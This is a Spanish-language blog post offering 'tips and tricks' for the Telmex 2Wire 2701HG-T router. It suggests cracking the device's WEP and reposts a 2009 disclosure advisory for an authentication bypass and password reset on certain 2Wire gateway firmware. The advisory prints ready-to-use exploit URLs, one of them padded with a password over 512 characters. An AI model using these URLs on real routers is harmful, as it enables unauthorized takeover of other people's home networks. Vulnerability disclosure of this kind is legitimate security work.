«
»

Telmex 2Wire 2701HG-T Gateway Tips y Trucos

entrar en el router : http://home/

consola : http://home/mdc

 

este aparato wep es facil de crackear con linux,  en solo unos minutos, busca un cd live como

 

hack 2wire_CD35_AuthBypass_PassReset_esp

2WIRE GATEWAY AUTHENTICATION BYPASS Y PASSWORD RESET (08/04/09)
==============================================================

DESCRIPCION
—————–
Existe una vulnerabilidad de bypass de autenticacion en page=CD35_SETUP_01
que permite poner un nuevo password a pesar de ya tener un password puesto.

Si se introduce un password de mas de 512 caracteres el password se elimina
y la proxima vez que se acceda al modem se pedira que se introduzca un nuevo
password.

VULNERABLE
—————-
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG

Firmware
5.29.51
3.17.5
3.7.1

NO VULNERABLE
——————-
Firmware
5.29.135.5 o superior

DISCLOSURE TIMELINE
————————-
03/27/2009 – 2wire Contactado
respuesta no satisfactoria
07/11/2009 – Envie los detalles completos a 2wire
ninguna respuesta
07/17/2009 – Envie el advisory y video demos a 2wire
subio el ticket a “escalated” pero ninguna respuesta
08/02/2009 – Lo hice publico en Defcon 17

EXPLOIT/POC
—————–
Authentication Bypass – usa esta pagina para poner un nuevo password

http://gateway.2wire.net?xslt?page=CD35_SETUP_01

Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv

Password Reset – usa la misma pagina pero con un password de > 512 caracteres

http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm

Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv

GREETS
————
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana
roa octalh Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield

Comunidad Underground de Mexico : https://www.underground.org.mx

h k m
http://www.hakim.ws

 

  • Share/Bookmark

Tags: , , , , , , , ,

This entry was posted on Martes, Marzo 2nd, 2010 at 6:11 PM and is filed under hack. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.

Bad Behavior has blocked 114 access attempts in the last 7 days.